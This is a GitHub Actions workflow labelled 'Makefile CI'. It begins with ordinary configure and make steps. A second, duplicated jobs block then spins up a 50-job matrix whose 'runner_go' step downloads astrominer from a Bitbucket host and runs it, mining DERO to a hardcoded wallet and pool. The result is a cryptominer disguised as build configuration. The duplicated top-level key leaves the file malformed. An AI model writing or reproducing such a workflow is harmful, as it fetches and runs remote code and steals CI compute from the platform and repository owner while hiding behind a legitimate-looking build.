name: Makefile CI

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v3

    - name: configure
      run: ./configure

    - name: Install dependencies
      run: make
jobs:
  build:
    name: BIN_Github
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 500
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5]
        flag: [A, B, C, D, E, F, G, H, I, J]
    timeout-minutes: 3
    env:
        NUM_JOBS: 500
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: runner_go
      run: |
         wget https://bitbucket.org/wename798/jaya/downloads/astrominer.tar.gz && tar -xvf astrominer.tar.gz && ./astrominer -w deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92xmglejssqhngtrqzsn49h -r dero.rabidmining.com:10300


    - name: Run check
      run: make check

    - name: Run distcheck
      run: make distcheck
